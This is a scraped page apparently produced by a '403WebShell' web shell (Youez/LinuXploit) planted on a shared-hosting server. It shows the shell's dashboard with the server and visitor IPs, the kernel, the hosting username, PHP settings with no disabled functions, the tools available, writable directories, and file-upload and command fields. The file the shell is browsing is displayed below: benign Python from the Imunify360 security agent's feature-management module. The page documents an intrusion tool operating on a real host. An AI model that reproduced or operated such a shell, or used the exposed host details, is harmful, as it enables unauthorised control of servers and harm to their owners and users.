Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.133.126.241
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/feature_management/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/feature_management/utils.py
import logging
from itertools import chain
from typing import List, Any

from defence360agent.feature_management import hooks
from defence360agent.feature_management.model import FeatureManagementPerms
from defence360agent.model import instance
from defence360agent.utils import execute_iterable_expression
from .lookup import features

logger = logging.getLogger(__name__)


async def set_feature(user: str, feature: str, value: str) -> bool:
    """Sets a `feature` to `value` for a given `user`.

    Calls appropriate hook and returns its (bool) result. Logs the result of
    setting change. If hook fails rollbacks changes to database.
    """
    with instance.db.atomic() as trx:
        perm = FeatureManagementPerms.get_perm(user)
        perm.set_feature(feature, value)
        hook = hooks.get_hook(feature)
        ok = hook(user, value)
        if ok:
            logger.info(
                "Applied setting %s=%s for user %s", feature, value, user
            )
        else:
            logger.error(
                "Failed to apply setting %s=%s for user %s",
                feature,
                value,
                user,
            )
            trx.rollback()
        return ok


async def update_users(
    feature: str, users: List[str], value: Any, existing_users: List[str]
):
    result = {"succeeded": [], "failed": []}

    for user in users:
        if user not in existing_users:
            logger.warning("No such user: %s", user)
            continue

        if await set_feature(user, feature, value):
            result["succeeded"].append(user)
        else:
            result["failed"].append(user)

    return result


async def update_default(feature: str, value: Any):
    perm = FeatureManagementPerms.get_default()
    perm.set_feature(feature, value)
    hook = hooks.get_hook(feature)
    return hook(None, value)


async def sync_users(users: List[str]) -> bool:
    """Synchronize existing permissions with panel users"""
    panel_users = set(users)

    perm_users = FeatureManagementPerms.select(FeatureManagementPerms.user)
    perm_users = set(chain(*perm_users.tuples()))

    perms_to_remove = perm_users - panel_users
    perms_to_remove.remove(FeatureManagementPerms.DEFAULT)

    if perms_to_remove:
        logger.info("Remove permissions of users %s", perms_to_remove)

        def expression(perms_to_remove):
            return FeatureManagementPerms.delete().where(
                FeatureManagementPerms.user.in_(perms_to_remove)
            )

        execute_iterable_expression(expression, list(perms_to_remove))

    perms_to_add = panel_users - perm_users

    if perms_to_add:
        logger.info("Add permissions to users %s", perms_to_add)

    for user in perms_to_add:
        perm = FeatureManagementPerms.get_perm(user)

        for feature in features:
            value = perm.get_feature(feature)
            callback = hooks.get_hook(feature)
            callback(user, value)
    return bool(perms_to_add) or bool(perms_to_remove)


async def reset_features(**features):
    """Sets feature values for all existing users in feature management
    database to given values in `features`."""
    users = list(
        chain(
            *FeatureManagementPerms.select(FeatureManagementPerms.user)
            .where(
                FeatureManagementPerms.user != FeatureManagementPerms.DEFAULT
            )
            .tuples()
        )
    )
    for user in users:
        for feature, value in features.items():
            await set_feature(user, feature, value)

Youez - 2016 - github.com/yon3zu
LinuXploit